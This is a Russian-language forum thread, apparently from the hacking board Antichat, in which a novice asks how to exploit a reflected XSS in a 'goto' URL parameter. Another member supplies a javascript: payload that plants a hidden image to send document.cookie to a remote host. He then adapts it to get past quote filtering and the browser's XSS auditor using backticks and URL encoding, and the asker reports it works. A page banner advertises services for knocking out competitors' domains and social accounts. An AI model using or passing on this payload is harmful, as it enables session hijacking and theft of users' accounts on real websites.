Как заюзать reflective XSS?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Как заюзать reflective XSS?

Опции темы

Поиск в этой теме

Опции просмотра

07.08.2017, 23:54

Dominant

Новичок

Регистрация: 09.06.2017

Сообщений: 5

Провел на форуме:
1386

Репутация: 0

Есть reflected XSS и вот такой код отрабатывает:

javascript:alert(1)

Но вот такой:

">alert(1)

проходит но уже блочится xss auditor-oом.

Можно как-то слить куки не добавляя внутрь страницы ?

08.08.2017, 01:22

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

Провел на форуме:
169212

Репутация: 441

Можно так:

Код:

javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));

Если есть переносы строк или символы ломающие синтаксис, то нужно использовать urlencode.

08.08.2017, 16:10

Dominant

Новичок

Регистрация: 09.06.2017

Сообщений: 5

Провел на форуме:
1386

Репутация: 0

Забыл упомянуть важную деталь. Инъекция в коде страницы отображается как атрибут src:

src="javascript:alert(1)"

Когда добавляю этот код:

javascript:i=document.createElement('img');i.style .display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.bo dy.appendChild(i));

то не отображается и не отрабатывает никак

08.08.2017, 16:49

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от Dominant

↑
Инъекция в коде страницы отображается как атрибут src

Выложи сюда, посмотрим.

08.08.2017, 17:02

Dominant

Новичок

Регистрация: 09.06.2017

Сообщений: 5

Провел на форуме:
1386

Репутация: 0

Код:

site.com/index.php?goto=javascript:alert(1);

Вот такой запрос даёт:

Код:

Такой

Код:

site.com/index.php?goto=">alert(a);

Даёт:

Код:

alert(a);" name="main" scrolling="auto" NORESIZE frameborder="0" marginwidth="20" marginheight="20" border="no">

но блочится xss аудитором

Такой:

Код:

site.com/index.php?goto=javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));

не выдает ничего

08.08.2017, 17:23

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

Провел на форуме:
169212

Репутация: 441

У меня нормально отрабатывает:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
   

[/COLOR][/COLOR]

08.08.2017, 17:36

Dominant

Новичок

Регистрация: 09.06.2017

Сообщений: 5

Провел на форуме:
1386

Репутация: 0

Цитата:

Сообщение от crlf

↑
У меня нормально отрабатывает:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
   

[/COLOR][/COLOR]

Но при вводе такого кода в адресную строку - фрейм вообще не добавляется.

Проверил - сбой происходит на "http://". Если убрать их из скрипта то всё добавляется в src но кавычки фильтруются:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

Без указания протокола нормально

08.08.2017, 18:29

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

Провел на форуме:
169212

Репутация: 441

Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.

Код:

site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));

08.08.2017, 21:44

Dominant

Новичок

Регистрация: 09.06.2017

Сообщений: 5

Провел на форуме:
1386

Репутация: 0

Цитата:

Сообщение от crlf

↑
Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.

Код:

site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));

Вот так заработало. Спасибо

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход